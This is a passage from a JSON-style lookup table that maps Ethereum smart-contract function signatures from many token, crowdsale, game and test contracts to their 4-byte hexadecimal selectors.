"getCCH_edit_14()": "0xbf1bb055", "setCCH_edit_14(string)": "0xed2648d3", "getCCH_edit_13()": "0xd340dd8a", "setCCH_edit_13(string)": "0x36cc1ebb", "newCrowdsale(bytes32,uint256,uint256,uint256,uint256)": "0xa429845e", "getWhitelistDetailsFor(address)": "0x9df196ec", "getWeiforTokens(uint256,uint256,uint256,uint32)": "0x5b9900ce", "getTokensForWei(uint256,uint256,uint256,uint32)": "0x0056c4c2", "canAcceptTokens_()": "0x69eadd76", "totalStoredDDT()": "0xe0cf17a5", "totalAffiliateDDT()": "0xda7eadd4", "affiliateCommission(address)": "0xc8582572", "withdrawAffiliateCommission()": "0xb77fc549", "getVaultInterestPerDay()": "0xb4d0ccb6", "getAllInvestorPositions()": "0x9528a278", "totalDDTforInterest()": "0x90e33e9c", "lastInvest(address)": "0x7be00510", "investedDDT(address)": "0x65af2a7d", "getAffiliateCommission()": "0x2cbef0f3", "storedProfit(address)": "0x27e10295", "partialDivest(uint256)": "0x26dfe583", "getSurplus()": "0x2383b074", "tell(uint256)": "0x55deb8fc", "boom(uint256)": "0xb443a085", "bust(uint256)": "0xaf378ce5", "cage(uint256)": "0xa2f91af2", "mock(uint256)": "0x3de377ec", "cash(uint256)": "0x17dc92f5", "dynamicExchangeChecks(bytes,uint256)": "0x52909fc2", "resetRequest()": "0xd4ee025f", "assigned()": "0xadb4d990", "history(uint256)": "0xa7a38f0b", "assign(string)": "0x6fbb439e", "requestedBy()": "0x4939bfde", "request(address)": "0x27c78c42", "isCertified(uint256,uint256)": "0xe6c21c24", "certificationManager()": "0xb7e28a3b", "setAssetWallet()": "0x9cd5c9a8", "setCertificationManager()": "0x72f5ae5f", "assetWallet()": "0x6b881724", "isCertified(uint256)": "0x4f82ff41", "certifications(uint256)": "0x3c0359a4", "addCertification(address)": "0x2cc695de", "xxx(uint256)": "0xa5e9585f", "Error(bytes)": "0xc75fb740", "Error(string,string)": "0xac283f5b", "Error(bool)": "0x024ddebe", "Error(uint128)": "0x93465da6", "Error(uint64)": "0x1bb1151a", "Error(uint32)": "0x70eaa1b4", "Error(uint16)": "0xc12d7b01", "Error(uint256)": "0x2e36a709", "Error(uint8)": "0xf0ba958c", "Error(bytes32)": "0xc0feee42", "redeemedAt(bytes32)": "0xbc4fcc4a", "updateRenExBalances(address)": "0xee0715ed", "renExBalancesContract()": "0xddf25ce9", "slasherAddress()": "0xd53c61bf", "RENEX_SETTLEMENT_ID()": "0xd23df2d1", "orderbookContract()": "0xbbe7221e", "DARKNODE_FEES_NUMERATOR()": "0xaba88037", "matchTimestamp(bytes32,bytes32)": "0xab0fd373", "RENEX_ATOMIC_SETTLEMENT_ID()": "0x943a5e28", "orderSubmitter(bytes32)": "0x75d4115e", "DARKNODE_FEES_DENOMINATOR()": "0x6af630d1", "updateOrderbook(address)": "0x6074b806", "renExTokensContract()": "0x4015e83b", "updateRenExTokens(address)": "0x34106c89", "traderWithdrawalSignals(address,address)": "0xfc257baa", "settlementContract()": "0xea42418b", "updateRewardVaultContract(address)": "0xe1c3aedc", "SIGNAL_DELAY()": "0xe12cbb3c", "traderBalances(address,address)": "0xc43c633b", "updateBrokerVerifierContract(address)": "0x67aa50ae", "withdraw(address,uint256,bytes)": "0x31f09265", "rewardVaultContract()": "0x23017a3a", "updateRenExSettlementContract(address)": "0x1d65551d", "brokerVerifierContract()": "0x080bdfa8", "brokers(address)": "0x66874cc5", "traderNonces(address)": "0x506ee1ef", "tokens(uint32)": "0xfbb6272d", "trustedDarknodeRegistry()": "0xfc722b2b", "challengers(bytes32)": "0xfc322d73", "submitChallengeOrder(bytes,uint64,uint64,uint256,uint256,uint256)": "0xc41c33af", "orderDetails(bytes32)": "0xa3c50b32", "challengeSubmitted(bytes32,bytes32)": "0x8c8b6fc5", "submitChallenge(bytes32,bytes32)": "0x4d4582a1", "orderSubmitted(bytes32)": "0x4778a5be", "trustedOrderbook()": "0x26cf660d", "ETHEREUM()": "0xf7cdf47c", "darknodeBalances(address,address)": "0x70324b77", "settlementRegistry()": "0xd09812e1", "updateDarknodeRegistry(address)": "0xaaff096d", "darknodeRegistry()": "0x9e45e0d0", "orders(bytes32)": "0x9c3f1e90", "settlementDetails(uint64)": "0xf8a09cd0", "registerSettlement(uint64,address,address)": "0xc2190c94", "minimumPodSize()": "0xc7dbc2be", "slasher()": "0xb1344271", "minimumBond()": "0xaa7517e1", "numDarknodesPreviousEpoch()": "0x71740d16", "nextMinimumPodSize()": "0x702c25ee", "nextMinimumBond()": "0x60a22fe4", "previousEpoch()": "0x5cdaab48", "claimDividendAll()": "0x30e1f16f", "claimDividend(uint256)": "0x9abd3572", "depositDividend()": "0xa289d187", "ProfitSharing(address)": "0x54beb2f4", "signatureOf(uint256,uint256)": "0x64631be6", "dataOf(uint256,uint256)": "0x934c563f", "lengthOf(uint256,uint256)": "0xc4a89e9e", "valueOf(uint256,uint256)": "0x75bedf12", "destinationOf(uint256,uint256)": "0x77446767", "executionBlockOf(uint256)": "0x2c354067", "executionTimeOf(uint256)": "0xc3ef83fc", "latestSenderOf(uint256)": "0x6c24c87d", "validICOPurchase()": "0x9339c01a", "getStates()": "0xd8ab8274", "calculateTokensTier(uint256,uint256)": "0xbb822605", "calculateExcessTokens(uint256,uint256,uint256,uint256)": "0x75b3ea8e", "calculateExcessBalance()": "0xc88215e7", "updateState()": "0x1d8557d7", "setRates(uint256)": "0x2d1babed", "buyICOTokens()": "0xe3f954be", "Crowdsale(address,address,uint256,uint256)": "0xd1c01b26", "isLocked(bytes32,uint256)": "0x54f5164b", "addTo(bytes32,uint256)": "0x2e8a34a7", "setThreshold(bytes32,uint256,uint256,address)": "0x72c0e7a4", "decodeParamsList(uint256)": "0x599c8761", "decodeParamId(uint256)": "0x0206e79d", "decodeParamOp(uint256)": "0x4867ec4f", "arr(uint256,uint256,uint256,uint256,uint256)": "0x1791cf01", "arr(uint256,uint256,uint256,uint256)": "0x02b985d3", "arr(uint256,uint256,uint256)": "0xbb23e3a9", "arr(uint256,uint256)": "0x45d0695f", "arr(uint256)": "0x71e5ee5f", "arr(address,address,uint256)": "0x4ba9bb67", "arr(address,address,address)": "0xb56ccd93", "arr(address,address,uint256,uint256,uint256)": "0x711085b2", "arr(address,uint256)": "0x584e492a", "arr(address,uint256,uint256)": "0xdc0bd75f", "arr(address,address)": "0xdaaadd8e", "arr(address)": "0x77d4c48b", "arr(bytes32,bytes32)": "0xdb9abbd4", "arr(bytes32)": "0x22b53192", "arr()": "0xe81d53cf", "addFeeFeedBack(address,string)": "0x8b278707", "shapeshiftTransfer(uint256,string,string)": "0x3c48d7de", "isOdd(uint256)": "0xd8b3a2eb", "isEven(uint256)": "0x2a2e1320", "testIntParserNegative()": "0xa981daca", "testIntParserTwoDecimal()": "0xe06b850c", "testIntParserOneDecimal()": "0xf133c38c", "testIntParser()": "0xc30718e8", "power10(uint256)": "0x324ecd96", "findFigures(uint256)": "0xa208b3b7", "findFigures(uint256,uint256)": "0x81e7645f", "recursiveRound(uint256,uint256,uint256)": "0x9663871f", "recursiveCeil(uint256,uint256,uint256)": "0xdd009f48", "recursiveFloor(uint256,uint256,uint256)": "0x742a9fa0", "uintFloor(uint256,uint256,uint256)": "0xe326acbf", "uintRound(uint256,uint256,uint256)": "0x110c478b", "uintCeil(uint256,uint256,uint256)": "0xae516449", "transferAllTokens(address,address)": "0x3eccca1e", "testEtherFundMeCrowdfunding()": "0x461efbf8", "getNodeId(uint256)": "0xc73c27bc", "getNodeIdsLength()": "0x70b60760", "getNodeIdx(string)": "0xf564bb8c", "getNode(string)": "0x9428522a", "cancelNode(string)": "0x24d3048d", "updateIdx()": "0x7b8f186e", "NodeAction()": "0x197a9187", "cashToEth()": "0xc5ac124d", "ethToCash()": "0x119f118d", "fixWithdrawalAddress(address)": "0x02c29349", "setWithdrawalAddress(address)": "0x21b8092e", "withdrawAllToWithdrawalAddress()": "0xb17a98b6", "setPriceForVerification(uint256)": "0xfb20dc80", "changeOwnerAccept()": "0x9538833c", "changeOwnerStart(address)": "0x546e1959", "revokeVerification(address)": "0xe998d2fa", "uploadSignedString(string,int256,bytes20,int256,string)": "0x1037706d", "bytes32ToString(bytes32,bytes32,bytes32)": "0xed927dae", "CryptonomicaVerification()": "0x1bb00447", "IdentityVerifier(address)": "0x1b47dbbe", "resetWithdrawEtherToValues()": "0x31670ea7", "getwithdrawEthertoAmountValue()": "0x7a6e5949", "getwithdrawEtherToAddressValue()": "0x26c21722", "getWithdrawEtherAmountValue()": "0xbae971e4", "getDepositEtherForAddressValue()": "0x1d356eef", "TokenEmission(string,string,uint8,uint256)": "0x40cc1239", "getNumberOfDeposits()": "0xd8583895", "setSkillName(uint256,bytes32)": "0x5a764631", "blockSkills(uint256[])": "0x9e206ed5", "addSkills(bytes32[])": "0xdcbfa4b7", "getConfigs(bytes32[])": "0x47e51d38", "setConfigs(bytes32[],uint256[])": "0x5670ef72", "EthlanceConfig(address)": "0x4a5a831b", "trexdevshop()": "0x5851f1e2", "shouldFail()": "0x678d2204", "getStored()": "0xe1f7ec5a", "removeEmailHash(uint256)": "0x588bf923", "addEmailHash(uint256,address)": "0x340dc485", "getIdentifier()": "0xaa23e03d", "buyTickets(uint256[],uint256,bytes)": "0x1b33157a", "getgamecardintro(uint256)": "0xd54ad593", "EthereumLottery(address,address)": "0x4c59b47c", "getgamecardname(uint256)": "0x51cb21ff", "getgamecard(uint256)": "0xc7abc42a", "setgamecard(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd2bfd24b", "setgamecardintro(uint256,string)": "0x6fc21429", "setgamecardname(uint256,string)": "0x9f15e729", "bidOnSiring(uint256,uint256,uint256)": "0x522c8401", "addgamecard(string,string,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0x7c12f1a4", "getgamecardlength()": "0xb34e7b9d", "setIncubatorContract(address)": "0x1e7bef65", "getgamecardcount()": "0xfd97c61a", "setCoreContract(address)": "0xc6266693", "setcardsalemoney(uint256,uint256)": "0xe36e1051", "setfocuscardid(address,address,uint256)": "0x1124e9ea", "setcardaddress(address,address,uint256)": "0x32750350", "getaddressfocuscardid2(address,address)": "0xc1e1955e", "breedAxies(uint256,uint256,uint256)": "0xc2db5890", "getaddressfocuscardid()": "0x39e1038f", "requireEnoughExpForBreeding(uint256)": "0xbcf7bd0b", "getaddressname()": "0x1dc7f1b4", "breedingFee()": "0xc69cd09d", "setaddressname(string)": "0x29432e0d", "getgamecardpos2(address,address)": "0x02c6d827", "getgamecardpos(uint256)": "0x640a404a", "getaddressret(address,address)": "0xa0836e28", "sendeth(uint256)": "0xe7964b49", "getsafemode()": "0xb2fed358", "setsafemode(uint256)": "0xdc190074", "delgodaddress(address,address)": "0x825918ee", "addgodaddress(address,address)": "0xa0263a5a", "ismaster()": "0x84a11df9", "getnowcardcount()": "0xfcd47e79", "getmaxcardcount()": "0x013eebd7", "ethsoccer48()": "0xba82f55d", "ExoMiniumToken(address,address)": "0x216716af", "reverseTransfer(address,uint256)": "0x5a0f385a", "getFreeToken()": "0x9a954af9", "_increaseToken(address,uint256)": "0x99ccf3da", "Omnidollar()": "0x1851e59e", "setWLMTfinney(uint256)": "0x8a192c70", "setWLMTPrice(uint256)": "0xea9eb855", "setWLMTBounce(uint256)": "0x350b4c6f", "GoodTronToken(address,address)": "0xbd295f30", "_0xDiaryToken()": "0x159dbef7", "getAmountFromBuyer(address,address)": "0xc81cf764", "KulouCoin()": "0x8a983fbc", "getNota(uint256)": "0xe3c04c32", "deleteNota(uint256)": "0xe6f0823c", "updateNota(uint256,string,string)": "0xee38232f", "createNota(string,string)": "0x494054f4", "JJ(uint256,string,string)": "0xe8f54364", "BytePeachCoin()": "0x9fc5852e", "Mytoken(uint256)": "0x935fb955", "digitalcashToken()": "0x0e3a04a7", "nextPositionId()": "0x899346c7", "trade(uint256)": "0xdf1dd826", "partialTrade(uint256)": "0xd5167b26", "nextOrderId()": "0x2a58b330", "cryptocompareBtcOracleUrl(bytes32)": "0x4888c619", "cryptocompareUsdOracleUrl(bytes32)": "0x9312434e", "yahooOracleUrl(bytes32)": "0x9635fc2c", "PayChain()": "0xc4b4dff1", "ESCOToken()": "0x409f2607", "createRegistryInstance(address,address)": "0x7110eed7", "getInstanceImplementation(bytes32)": "0xf9d80dcd", "getRegistryImplementation()": "0xcb43269d", "getDeployedLength(address)": "0x1543136c", "getInstances(bytes32)": "0xfc539a4a", "setRegistryExecID(bytes32)": "0x265580f5", "createAppInstance(bytes32,bytes)": "0xdb7400a5", "checkErrors(bytes32)": "0xf75ccbf0", "configure(address,address,address)": "0x55d28f20", "getVersionImplementation(address,bytes32,address,bytes32,bytes32)": "0xd0a45f84", "getLatestVersion(address,bytes32,address,bytes32)": "0xb3b163c4", "changeGameAddress(address)": "0xdffd6054", "assignedGameContract()": "0x3ca6a437", "QuantiModoToken()": "0xc2b70850", "GoodDayTokens()": "0x3f576af0", "MyPinerTokenTest3()": "0xefe9e86b", "FLUXBlockToken()": "0x04ea23bf", "virtualc()": "0x74d15357", "BalanceEth()": "0xaab6606e", "approveAllAndCall(address,bytes)": "0x816c7da4", "getRecord()": "0xf18ad6fb", "sendNewEntry(string)": "0x6b9da657", "record()": "0x266cf109", "viewFourthLotOfClauses()": "0xae6d8a52", "viewThirdLotOfClauses()": "0x60851f28", "viewSecondLotOfClauses()": "0x9137f9b1", "viewFirstLotOfClauses()": "0x0ef14b98", "viewMostRelevantClauses()": "0xdfebb4ee", "viewContractState()": "0xd6cb9ec2", "endDispute()": "0xd1fc8cf3", "startDispute()": "0xbbdc7709", "closeTicket()": "0x178b9d1a", "openTicket()": "0x0e34df82", "modifyRent(uint256)": "0xa4b32bd7", "depositFrom(uint256)": "0x516583fe", "lockupTok(address,uint256)": "0xda36d217", "updateTokPerLockRate(uint256)": "0xd94c7c29", "mintLockCashout(int256,address,uint256)": "0x89920edf", "mintTokens(int256,uint256,uint256,address)": "0x8f62905f", "addLog(bytes)": "0xc3f7ec97", "changeSettings(string,string,uint256,uint256,address,address,address,address,uint256)": "0x63897c7e", "CCCoinToken(string,string,uint256,uint256,address,address,address,address,uint256)": "0xccf6b8b3", "SendFund(uint256,bytes32)": "0x21b6fcbf", "BallotUp()": "0xf2a5630a", "getAddressesAccounts()": "0x84160ec0", "addAccount(string,uint256,string,string,uint256)": "0x71c147fb", "getNbTrade()": "0xf20717e9", "getVolume()": "0xc67bbc24", "DetherTx()": "0xd70d2e26", "ColorCoin(address,address)": "0x349221be", "endGame(address)": "0x2a035b6c", "createGame(uint8)": "0xe580f6ab", "test_insert_findWithHintNotTightBound(int256)": "0xd9b238ea", "test_insert_findWithHintNextIncreased(int256)": "0xe42b0193", "test_insert_findWithHintNextRemovedUpdateTail(int256)": "0x35a1bf6e", "test_insert_findWithHintNextRemoved(int256)": "0xcab7f0cc", "test_insert_findWithHintPrevDecreased(int256)": "0xc18b9760", "test_insert_findWithHintPrevRemovedUpdateHead(int256)": "0x03137d43", "test_insert_findWithHintPrevRemoved(int256)": "0xf6e7f69d", "registerAsExportingAuthority(address)": "0x79f9b10b", "registerAsImportingAuthority(address)": "0x27f12c8e", "isAcceptedExportingAuthority(address)": "0x44389678", "isAcceptedImportingAuthority(address)": "0x99704b65", "getExportingAuthority()": "0x4d9fcee9", "getImportingAuthority()": "0x34c6766f", "Participant(string,address)": "0xa492ef60", "Tiguan5Coin()": "0x8db02d79", "register(address,uint256,uint256)": "0xf9454f3f", "isTyped(address,uint256)": "0x95bdca94", "typeOf(address,uint256)": "0xbd51525e", "grantVestedTokens(address,uint256,uint64,uint64,uint64)": "0x00e1986d", "Standard23TokenMock(address,uint256)": "0xfcbc1bc4", "RaffleMakersBook(string,uint256)": "0x73f9ff23", "amountOfQuotations()": "0x52ac3235", "MatchingEngine()": "0x3b265d35", "test_twoInvalidEqString()": "0xe592172e", "test_threeInvalidEqString()": "0xaca8dd6b", "test_oneValidEqStringNoLog()": "0xd1650f7f", "test_twoValidEqString()": "0xf3ca2b54", "test_threeValidEqString()": "0xa7dc0aee", "test_oneInvalidEqString2()": "0x72012ef6", "test_oneInvalidEqString()": "0x48c6af04", "test_oneValidEqString()": "0x776184b1", "promethCount()": "0xa12301f5", "sayHi()": "0x0c49c36c", "createPrometh(address)": "0xefce0688", "getUserTaskAtIndex(uint256)": "0x20fea5cf", "hasTeam()": "0x909d2cc1", "associateWithTeam(bytes32)": "0x66566947", "associateWithTaskAddress(address)": "0xa62a86a0", "User(bytes32,bytes32,bytes32,bytes32,bytes32)": "0x394f4ec6", "OutcomeToken()": "0xc98c3083", "mock_setShouldSucceedTransfers(bool)": "0x984e1ff4", "ERC20TokenMock(uint256,string,uint8,string)": "0xec3c155e", "setTolerance(bytes32,uint256)": "0x45f67eb4", "deleteHelper(bytes32)": "0x29cd92cf", "isMetered()": "0x83fe10e4", "fee(bytes32)": "0x27cdab06", "setBilateral(bytes32,bool,bool)": "0x58963c85", "setGivenReadings(bytes32,bool,bool)": "0x48025070", "setReadings(bytes32,uint256,bool)": "0xe8dc800c", "setConfirmations(bytes32,bool,bool)": "0xe2fc5d19", "setActive(bytes32,bool)": "0x6485d678", "setStake(bytes32,uint256)": "0x3541fd53", "setAmount(bytes32,uint256)": "0xc7bb38e7", "setPrice(bytes32,uint256)": "0x10d8d74d", "setClient(bytes32,address)": "0x9daaae94", "setMarket(bytes32,bytes32)": "0x8154d4de", "parcipateCrowdsaleAll()": "0xfc1da46a", "parcipateCrowdsaleInvestor(address)": "0x3e55eab0", "PresaleFundCollector(address,uint256,uint256)": "0xae1a15e3", "OpenController(address)": "0xad764780", "getEthBalance()": "0x70ed0ada", "onDeposit(uint256)": "0x8287ccb4", "getOwnerDeposit()": "0x264f28fe", "calculatePayerDeposit(uint256)": "0xae2f1f6f", "calculateInitialPayerDeposit(uint256)": "0x6086e22f", "changeMaturity(uint256)": "0x78263edf", "randomize(bytes32)": "0x4c90aaeb", "check(bytes32,uint256,address,uint32,uint32,bytes32[])": "0xfb14cbca", "getRandomValue(bytes32)": "0x080d840c", "getMaturity(bytes32)": "0x7ae8c854", "getValue(bytes32)": "0x69843940", "init(bytes32)": "0x3b663195", "testGetAllCases()": "0x520b1b65", "testGetCaseAtIndex()": "0x21c882ef", "testGetCaseCount()": "0x5ecb7d20", "testGetProgress()": "0x3afb01d4", "testUpdateProgress()": "0xa4530b4b", "testUpdateLawyer()": "0x708547f3", "testDeleteCase()": "0x3c46f604", "testIsCase()": "0x0aed3c36", "testInsertCase()": "0x30c308d8", "testConstructorUsingDeployedContract()": "0x6361d9e9", "toKiwi(uint256)": "0x3a8ac516", "_isAuthorized(address,uint256)": "0xf3586fb9", "_getApprovedAddress(uint256)": "0x56d5f541", "move(uint8,uint256,bytes,uint8,bytes32,bytes32)": "0xbffeadd6", "setGasPrice(uint8)": "0x2e102ee4", "setGameAddress(uint8,address)": "0xe8d70569", "shift(address,uint256)": "0xc094df20", "casinoProxy(address,address,address)": "0xcba456df", "withdrawBankroll(uint256)": "0x19c76700", "casinoBank(address)": "0x81641ff7", "createDeposit(uint256,bytes)": "0xed7ad2d2", "MikeChanCoin()": "0x81f0c440", "getServiceName(address)": "0x75030996", "getServiceAddress(bytes)": "0x14bd0c21", "setService(bytes,address)": "0x6bbeba8a", "CryptaurMigrations()": "0xd292b920", "Jii()": "0x699c267a", "PLATPriceOracle()": "0xae9569d0", "LockedInToken()": "0x8c74d62c", "WallCoin()": "0x890c6848", "setFee(uint256,uint256)": "0x52f7c988", "XITOToken(address)": "0xe0c78337", "redistributeFees(uint256)": "0x59ff6473", "PCM(uint256)": "0x34f03321", "NinjaCoin()": "0xfe8370bb", "withdrawDonation()": "0xe81e1ccc", "generousDonation()": "0x6643caba", "ETHCONEarlyBirdDonation(address)": "0xebcc8eb6", "CDEos(uint256,string,uint8,string)": "0xe0c2bc77", "DigitalThothToken()": "0x1f6e6f3a", "ZincElement()": "0x0e87457b", "CTBToken()": "0xfc14a47c", "collectERC20(address,uint256)": "0x03c1d1df", "WankCoin()": "0x8c33417c", "Joyreum()": "0x323a7acb", "BTN()": "0x5cbf0850", "TrillionToken()": "0x2d136dd6", "acceptPayment(address)": "0x2a9f1a79", "CCRCrowdsale()": "0xb58617d9", "currentSaleLimit()": "0x2a18ca16", "addManyAuthorizeToWhitelist(address[])": "0xd3dd9a18", "distributionTokens()": "0xd30e9302", "setVestingAddress(address)": "0xe4d75c9d", "transferFromICO(address,uint256)": "0xf501d8b8", "Asset()": "0xdf42e80e", "CryptekZ()": "0x7fb00168", "draw(address,uint256)": "0x4a03707c", "loser(address)": "0xc5d51586", "winnerReward(address,uint256)": "0xd7a15951", "betContractDOWN()": "0xda0d76f8", "createBet()": "0xdec9ba44", "claimLockedTokens(address)": "0x1adadda8", "handleExternalBuyers(address[],uint256[],uint256[],uint256[])": "0x8a426b1b", "handleEarlySaleBuyers(address[],uint256[])": "0x7a38012e", "updateDates(uint256,uint256,uint256,uint256,uint256,uint256)": "0x064292a8", "makeTransferable()": "0x696fd68c", "TokenSale(uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0xb4328e5b", "getBonus(uint256,address)": "0x446dba8f", "updateMatchInfo(uint256,string,uint64,uint64)": "0x7fef2d38", "createMatch(uint256,string,string,int32,int256,uint64,uint64)": "0xb028c059", "setRoleCapability(uint8,address,bytes4,bool)": "0x7d40583d", "setUserRole(address,uint8,bool)": "0x67aff484", "BITNOT(bytes32)": "0x93aa5ca8", "transfersRemaining()": "0x6ef1a114", "DickheadCash()": "0x3e786d80", "UGToken()": "0x80c5bef8", "depositsOf(address)": "0xe3a9db1a", "validPurchaseSize()": "0x2b919aa6", "validBeneficiary(address)": "0xe32d76de", "FundRequestPrivateSeed(uint256,address)": "0xf2dadd3d", "transferMaintainer(address)": "0xbffd952a", "adjust_Transfer_data(bool)": "0x1e6f9c1e", "adjust_Transfer_nodata(bool)": "0x49beee4f", "adjust_ERC223Transfer(bool)": "0xde1f892a", "ERC20transfer(address,uint256,bytes)": "0x74de8caf", "CoinvestToken(uint256)": "0x7ace41f2", "getStartPrice()": "0xbaffa903", "pixelblockPrice(uint24,uint24,uint24,uint24)": "0x26dd1510", "transfer(address,uint24)": "0x5b195c86", "setNameLink(string,string)": "0x489ba092", "OneMillionToken()": "0xab1ebb4d", "setPixelToken(uint24,uint256,uint24)": "0x130fbba4", "buyPixelToken(uint24,uint256,uint24)": "0xffe619df", "buyPixelTokenFor(uint24,uint256,uint24,address)": "0x7d91da87", "getPixelToken(uint24)": "0xc406d4af", "BRN()": "0x03da04d7", "HacToken()": "0x0ebe0f32", "IronHands2()": "0xf5018d1c", "ChinhCoin(uint256,string,uint8,string)": "0x0fea9be6", "decreaseGlobalInterestAmount(uint256)": "0x09fbb22c", "increaseGlobalInterestAmount(uint256)": "0x46478e91", "transferFromOwner(address,uint256,uint256)": "0x0f14212b", "createTokensFromOther(address,uint256,address)": "0x55710346", "createTokensFromEther()": "0x69f1256f", "refundToOtherProcess(address,uint256)": "0x94025211", "getRefundInfo(address)": "0xeb7b7006", "processRefundEther(address,uint256)": "0x56c190ec", "sendEtherToMultisig()": "0x41288e76", "newDay()": "0x9039e01d", "balanceWithInterest(address)": "0x412740c5", "updateDate(address)": "0x6981c879", "theCyberMessage(string)": "0xa82e0dcc", "refundUnconfirmed()": "0xd3631e00", "getRateIcoWithBonus()": "0x207beb59", "setRateIcoMainSale(uint256)": "0xd186659d", "setRateIcoPreICO(uint256)": "0xdb71c776", "setStartIcoPreICO(uint256)": "0x8fae065c", "TRND()": "0x1dbe342d", "GetPermissionsList(address,address)": "0xdb87cbcc", "SetPermissionsList(address,address,uint8)": "0xe45c47b9", "Bitsta()": "0x8195031f", "withdrawAltcoinTokens(address)": "0x2195845f", "BitcoinDiamondToken()": "0x3c287a3f", "GICAToken()": "0xc82d81dd", "THBCToken()": "0x9504f28a", "finishUserDistribution()": "0x5a97b84a", "teamRelease(address)": "0x2c58139c", "TFFC()": "0x6fd2e6d0", "teamdistr(address,uint256)": "0xfb65a1a3", "MrFibreToken()": "0xa42ea491", "userChallenge(uint256)": "0xa1b0f3a0", "userWithdraw()": "0xa646f9ad", "ownerChange(uint256,address)": "0x75811c15", "publicGetState()": "0xfe26da0c", "publicGetBalance(address)": "0xd4300225", "TokenERC20(uint32,string,uint8,string,address)": "0x2c8ace6c", "callTokenTransferFrom(address,uint256)": "0x47df1cff", "exchangeTokens()": "0xe167dbca", "startExchange()": "0x75e01780", "finishExchange()": "0xe8756037", "changeUnitsUserCanBuyLimit(uint256)": "0xbd53cb96", "changeTotalRemaining(uint256)": "0x9254c2a8", "changeTotalDistributed(uint256)": "0xb74f312e", "changeTokenApproves(uint256)": "0xdd2594af", "changeTotalExchange(uint256)": "0x814c2aa1", "changeUnitsUserCanBuyLimitEth(uint256)": "0xab03d0e8", "changeUnitsOneEthCanBuy(uint256)": "0x76b18618", "changeTokenSender(address)": "0x27f498c9", "changeTokenAddress(address)": "0xc9cda91f", "GIT()": "0xe45a93cc", "changeSupply(uint256)": "0x39a7919f", "DINAR()": "0xe882f844", "BulkTransfer(address[],uint256[])": "0xa55ec39d", "convertToMiniTtc(uint256)": "0x4c1f524f", "TTCSale(address,uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0xaf819c67", "TTCToken(address)": "0x45406101", "getAllScripts(uint256)": "0xa9466a88", "getScriptsCount()": "0x918f644e", "getAllSigners(uint256)": "0x9ac467f9", "getAllSignersCount()": "0xc06d7744", "checkQuorum(uint256)": "0x9fc3b4e7", "removeSigners(address[])": "0x8d361e43", "addSigners(address[])": "0xe8906a2d", "cancelScript(address)": "0x278a5e7c", "sign(address)": "0xf71be837", "developer_withdraw_ETH()": "0xabb254de", "IonChain()": "0x2756d38a", "ERC20()": "0xcc4aa204", "developer_increase_price(uint256)": "0xb713ef49", "SICX()": "0x5a42e85f", "DOGToken(uint256)": "0x262aa9fc", "tokenPurchase(address,uint256)": "0x03b753dd", "buyToken(address,uint256)": "0x68f8fc10", "NeoToken()": "0xd4d9748d", "getDistributions()": "0x02aa6318", "verifyGame(uint256)": "0x524d7daf", "verify(bytes32,uint8[5],bytes32)": "0xd27416ec", "createHash(uint8[5],bytes32)": "0x109447e1", "contains(uint256,address)": "0x7eccc40a", "withdrawTo(address)": "0x72b0d90c", "withdrawToMany(address[])": "0x4e9466f7", "setDistribution(uint256[5])": "0x787bd6f9", "reveal(uint256,uint8[5],bytes32)": "0x68d5a014", "setHash(uint256,bytes32)": "0x6cde6380", "getValue(uint256)": "0x0ff4c916", "getSecret(uint256)": "0x8d17664d", "hasSecret(uint256)": "0x41e6fd4b", "hasHash(uint256)": "0xf3391998", "getPlayers(uint256)": "0x460e2049", "gamesOf(address)": "0xfa1b3eb8", "joinGameFromBalance(uint256)": "0xd75ebde2", "joinGame(uint256)": "0xefaa55a0", "indexOfOperator(address)": "0x31399b4d", "containsOperator(address)": "0x33d5d29b", "setStatus(bool)": "0x5c40f6f4", "SlammerTime(address)": "0xa181b040", "checkIfEligable(address,address)": "0x78ec1eb4", "claimHelper()": "0x810bbec3", "depositHelper(uint256)": "0x822e57f1", "ProofOfLongHodlV2()": "0x745828ef", "WebPaisa()": "0x6fd37039", "register(address[])": "0x43dc3ab2", "reset(address,address,address,address,address,address,address)": "0xde6c4f4b", "restrict(address,address)": "0xc4f14c9c", "restrictTransfert()": "0xe5796716", "allowTransfert()": "0x8c877527", "VLOGCoin(uint256,string,string)": "0xa4c9bb28", "ownerPauseRecommend(bool)": "0xeeda22c6", "ownerPauseJackpot(bool)": "0x9aa99dc8", "ownerSetRecommendProportion(uint16)": "0x9e80cab0", "ownerSetJackpotOfHouseEdge(uint16)": "0x3d832080", "setOwner(address,bytes32,address)": "0x0f1ed0c6", "removeAllowCnsContract(address,bytes32,address,bytes32)": "0x123d997a", "addAllowCnsContract(address,bytes32,address,bytes32)": "0x45fd4040", "remove(address,bytes32)": "0x64afab72", "create(address,bytes32,address,address[],address,bytes32)": "0xa742a942", "getLockedFundsReleaseTime()": "0x5136260d", "getLockedFunds()": "0x4124a6a7", "payOut(address)": "0x1922ff39", "payIn()": "0xfcddd056", "Lockup36m(address)": "0xaf6e66e6", "reveal(uint256[],bool[],bytes32[])": "0x900f080a", "bid(bytes32)": "0x957bb1e0", "BlindAuction(uint256,uint256,address)": "0xac789e5f", "run2(uint256,bytes32[],uint256[],uint256,uint256,uint256,uint256)": "0x33267961", "run(bytes32[],bytes32[],bytes32[],bytes32[],bytes32[],bytes32[],bytes32[],bytes32[],uint256,uint256,uint256,uint256)": "0x927675b8", "payoutForBudget(uint256,uint256)": "0x375e3ea8", "payoutForTimeline(uint256,uint256)": "0xa9e79359", "pop()": "0xa4ece52c", "krakenTicker()": "0x1b8f3d23", "EtherStopLoss()": "0x0dc32b72", "getPeakSupply()": "0x1432621a", "getReportingWindow()": "0xefd64af9", "inheritedConstant()": "0xbe06e4e8", "inheritedView()": "0x6aeaef97", "inheritedPure(uint256,uint256)": "0xdcac69c3", "beConstant()": "0x428d475a", "beView()": "0x54653352", "bePure(uint256,uint256)": "0x6c7c7c73", "finalizeICO()": "0x23cc75a8", "finalizePreICO()": "0x4e46fc2c", "TwoStageCrowdsale(uint256,uint256,address)": "0xc45d5fcb", "getVersions(bytes32)": "0x9738418c", "getResource(bytes32,uint256,bytes32)": "0xcba74da1", "get(bytes32,uint256)": "0x18ae19c2", "transferLibOwnership(bytes32,address)": "0xc112601c", "registerResource(bytes32,uint256,bytes32,string)": "0x4134a92a", "register(bytes32,uint256,address,string,uint256)": "0xb48b4204", "test_addAndRemovePermissions()": "0x247bb432", "test_defaultPermissions()": "0x6e56e895", 